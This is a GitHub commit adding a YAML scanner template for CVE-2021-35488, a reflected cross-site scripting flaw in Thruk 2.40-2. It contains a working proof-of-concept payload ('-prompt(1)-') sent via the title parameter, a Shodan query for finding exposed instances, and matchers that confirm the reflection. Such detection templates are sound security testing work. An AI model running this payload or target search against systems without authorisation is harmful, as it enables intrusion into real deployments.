Create CVE-2021-35488.yaml

patch-1
Arafat Ansari 2022-08-15 03:01:30 +05:30 committed by GitHub
parent 689a07d542
commit d5f7991bd4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: CVE-2021-35488
info:
name: Thruk 2.40-2 - Reflected Cross Site Scripting
author: arafatansari
severity: medium
description: |
Thruk 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] Reflected XSS via the host or title parameter. An attacker could inject arbitrary JavaScript into status.cgi. The payload would be triggered every time an authenticated user browses the page containing it.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35488
- https://www.gruppotim.it/redteam
metadata:
shodan-query: http.html:"Thruk"
verified: "true"
tags: xss,cve,2021
requests:
- method: GET
path:
- "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title='-prompt(1)-'"
matchers-condition: and
matchers:
- type: status
status:
- 401
- type: word
words:
- "'-prompt(1)-'"